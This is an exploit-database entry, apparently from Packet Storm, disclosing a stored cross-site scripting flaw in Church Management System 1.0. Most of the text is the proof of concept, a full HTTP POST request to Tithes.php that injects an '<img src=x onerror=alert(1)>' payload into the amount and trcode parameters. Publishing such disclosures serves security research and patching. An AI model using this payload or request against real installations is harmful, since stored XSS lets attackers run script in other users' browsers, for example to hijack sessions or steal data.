Exploit for Church Management System 1.0 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:163364
# Exploit Title: Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)  
# Date: 07/03/2021  
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html  
# Version: 1.0  
# Tested on: Windows 10  
  
# Proof of Concept :  
  
#Payload: <img src=x onerror=alert(1)>  
#Injectable parameters : amount= and trcode=  
  
###################### REQUEST ##########################################  
  
POST /cman/members/Tithes.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 85  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/cman/members/Tithes.php  
Cookie: PHPSESSID=cne2l4cs96krjqpbpus7nv2sjc  
Upgrade-Insecure-Requests: 1  
  
amount=<img+src%3dx+onerror%3dalert(1)>&trcode=<img+src%3dx+onerror%3dalert(1)>&save=